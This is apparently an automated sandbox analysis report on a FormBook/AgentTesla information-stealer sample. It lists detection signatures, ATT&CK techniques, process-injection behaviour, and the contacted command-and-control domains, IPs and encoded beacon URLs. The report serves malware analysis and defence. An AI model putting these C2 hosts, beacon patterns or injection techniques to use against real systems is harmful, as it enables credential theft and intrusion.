          Source: explorer.exe, 00000005.00000000.251901669.0000000001980000.00000002.00000001.sdmp, msdt.exe, 0000000A.00000002.480683783.0000000003560000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeQueries volume information: C:\Users\user\Desktop\DNPr7t0GMY.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.0.DNPr7t0GMY.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.DNPr7t0GMY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.DNPr7t0GMY.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.DNPr7t0GMY.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.478198621.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.216484865.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.220966733.00000000042E9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.478065429.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271551704.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.271485121.0000000000CC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.0.DNPr7t0GMY.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.DNPr7t0GMY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.DNPr7t0GMY.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.DNPr7t0GMY.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 432808 Sample: DNPr7t0GMY Startdate: 10/06/2021 Architecture: WINDOWS Score: 100 32 www.totally-seo.com 2->32 34 www.boogerstv.com 2->34 36 2 other IPs or domains 2->36 46 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 7 other signatures 2->52 11 DNPr7t0GMY.exe 3 2->11         started        signatures3 process4 file5 30 C:\Users\user\AppData\...\DNPr7t0GMY.exe.log, ASCII 11->30 dropped 62 Tries to detect virtualization through RDTSC time measurements 11->62 15 DNPr7t0GMY.exe 11->15         started        signatures6 process7 signatures8 64 Modifies the context of a thread in another process (thread injection) 15->64 66 Maps a DLL or memory area into another process 15->66 68 Sample uses process hollowing technique 15->68 70 Queues an APC in another process (thread injection) 15->70 18 explorer.exe 15->18 injected process9 dnsIp10 38 cleanxcare.com 78.31.67.91, 49742, 80 MYLOC-ASIPBackboneofmyLocmanagedITAGDE Germany 18->38 40 www.ruhexuangou.com 23.82.57.32, 49752, 80 LEASEWEB-USA-SFO-12US United States 18->40 42 15 other IPs or domains 18->42 54 System process connects to network (likely due to code injection or exploit) 18->54 22 msdt.exe 18->22         started        signatures11 process12 dnsIp13 44 192.168.2.1 unknown unknown 22->44 56 Modifies the context of a thread in another process (thread injection) 22->56 58 Maps a DLL or memory area into another process 22->58 60 Tries to detect virtualization through RDTSC time measurements 22->60 26 cmd.exe 1 22->26         started        signatures14 process15 process16 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          DNPr7t0GMY.exe56%VirustotalBrowse
          DNPr7t0GMY.exe40%MetadefenderBrowse
          DNPr7t0GMY.exe61%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          DNPr7t0GMY.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.0.DNPr7t0GMY.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.DNPr7t0GMY.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.brunoecatarina.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.brunoecatarina.com/p2io/?-Z0xlN=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jK+CrAnEI1b&1bs8=cR-P8LD80%Avira URL Cloudsafe
          https://www.casar.com/assunto/organizacao/0%Avira URL Cloudsafe
          http://www.cleanxcare.com/p2io/?-Z0xlN=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YhWug+Cxzy&1bs8=cR-P8LD80%Avira URL Cloudsafe
          https://www.casar.com/assunto/casamentos/decoracao-de-casamento/0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.ololmychartlogin.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9OtfZIW5A7WG0%Avira URL Cloudsafe
          https://www.casar.com/assunto/lua-de-mel-2/0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          https://www.casar.com0%Avira URL Cloudsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.swayam-moj.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIDpWXBn/Ha0%Avira URL Cloudsafe
          https://www.casar.com/assunto/noivas/dicas-para-noivas/0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.essentiallyourscandles.com/p2io/?-Z0xlN=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&1bs8=cR-P8LD80%Avira URL Cloudsafe
          https://www.casar.com/assunto/casamentos/casamentos-reais/0%Avira URL Cloudsafe
          https://www.casar.com/assunto/cha-de-panela/0%Avira URL Cloudsafe
          https://www.casar.com/assunto/noivas/vestidos-de-noiva/0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.ruhexuangou.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbw0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.yunlimall.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN227RveoPSR010%Avira URL Cloudsafe
          http://www.thriveglucose.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d60%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
          		13.59.53.244
          		truefalse
            		high
            www.brunoecatarina.com
            		54.85.86.211
            		truetrueunknown
            www.yunlimall.com
            		142.111.47.2
            		truetrue
              		unknown
              thriveglucose.com
              		184.168.131.241
              		truetrue
                		unknown
                www.ololmychartlogin.com
                		212.32.237.92
                		truetrue
                  		unknown
                  www.ruhexuangou.com
                  		23.82.57.32
                  		truetrue
                    		unknown
                    parkingpage.namecheap.com
                    		198.54.117.216
                    		truefalse
                      		high
                      cleanxcare.com
                      		78.31.67.91
                      		truetrue
                        		unknown
                        shops.myshopify.com
                        		23.227.38.74
                        		truetrue
                          		unknown
                          ext-sq.squarespace.com
                          		198.185.159.144
                          		truefalse
                            		high
                            swayam-moj.com
                            		199.195.117.147
                            		truetrue
                              		unknown
                              www.thriveglucose.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.boogerstv.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.kce0728com.net
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.cleanxcare.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.painhut.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.totally-seo.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.essentiallyourscandles.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.swayam-moj.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.advancedaccessapplications.com
                                              		unknown
                                              		unknowntrue
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.brunoecatarina.com/p2io/?-Z0xlN=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jK+CrAnEI1b&1bs8=cR-P8LD8true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.cleanxcare.com/p2io/?-Z0xlN=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YhWug+Cxzy&1bs8=cR-P8LD8true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.ololmychartlogin.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9OtfZIW5A7WGtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                www.adultpeace.com/p2io/true
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		low
                                                http://www.swayam-moj.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIDpWXBn/Hatrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.essentiallyourscandles.com/p2io/?-Z0xlN=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&1bs8=cR-P8LD8true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.ruhexuangou.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbwtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.yunlimall.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN227RveoPSR01true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.thriveglucose.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d6true
                                                • Avira URL Cloud: safe
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.casar.com/assunto/organizacao/msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                      		high
                                                      https://www.casar.com/assunto/casamentos/decoracao-de-casamento/msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.tiro.comexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                        		high
                                                        https://www.casar.com/assunto/lua-de-mel-2/msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.goodfont.co.krexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssDNPr7t0GMY.exe, 00000002.00000002.220290008.0000000003320000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.typography.netDexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.casar.commsdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://fontfabrik.comexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://embed.typeform.com/embed.jsmsdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://connect.facebook.net/en_US/fbevents.jsmsdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://casarpontocom.zendesk.com/hc/pt-brmsdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://www.casar.com/assunto/noivas/dicas-para-noivas/msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fonts.comexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.sandoll.co.krexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDNPr7t0GMY.exe, 00000002.00000002.220254281.00000000032E1000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.pinterest.com/casarpontocommsdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.sakkal.comexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.fontbureau.comexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                          		high
                                                                          https://www.casar.com/assunto/casamentos/casamentos-reais/msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.youtube.com/casarpontocommsdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://www.casar.com/assunto/cha-de-panela/msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.jsmsdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.jsmsdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://www.casar.com/assunto/noivas/vestidos-de-noiva/msdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.carterandcone.comlexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.241726965.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://cdnjs.cloudflare.com/ajax/libs/es5-shim/4.5.14/es5-shim.min.jsmsdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://instagram.com/casarpontocommsdt.exe, 0000000A.00000002.483640962.0000000005362000.00000004.00000001.sdmpfalse
                                                                                          		high

                                                                                          Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          142.111.47.2
                                                                                          		www.yunlimall.comUnited States
                                                                                          		18779EGIHOSTINGUStrue
                                                                                          23.82.57.32
                                                                                          		www.ruhexuangou.comUnited States
                                                                                          		7203LEASEWEB-USA-SFO-12UStrue
                                                                                          13.59.53.244
                                                                                          		prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comUnited States
                                                                                          		16509AMAZON-02USfalse
                                                                                          54.85.86.211
                                                                                          		www.brunoecatarina.comUnited States
                                                                                          		14618AMAZON-AESUStrue
                                                                                          23.227.38.74
                                                                                          		shops.myshopify.comCanada
                                                                                          		13335CLOUDFLARENETUStrue
                                                                                          199.195.117.147
                                                                                          		swayam-moj.comUnited States
                                                                                          		55293A2HOSTINGUStrue
                                                                                          184.168.131.241
                                                                                          		thriveglucose.comUnited States
                                                                                          		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                          212.32.237.92
                                                                                          		www.ololmychartlogin.comNetherlands
                                                                                          		60781LEASEWEB-NL-AMS-01NetherlandsNLtrue
                                                                                          78.31.67.91
                                                                                          		cleanxcare.comGermany
                                                                                          		24961MYLOC-ASIPBackboneofmyLocmanagedITAGDEtrue

                                                                                          Private

                                                                                          IP
                                                                                          192.168.2.1

                                                                                          General Information

                                                                                          Joe Sandbox Version:32.0.0 Black Diamond
                                                                                          Analysis ID:432808
                                                                                          Start date:10.06.2021
                                                                                          Start time:19:11:34
                                                                                          Joe Sandbox Product:CloudBasic
                                                                                          Overall analysis duration:0h 10m 52s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Sample file name:DNPr7t0GMY (renamed file extension from none to exe)
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                          Number of analysed new started processes analysed:25
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:1
                                                                                          Technologies:
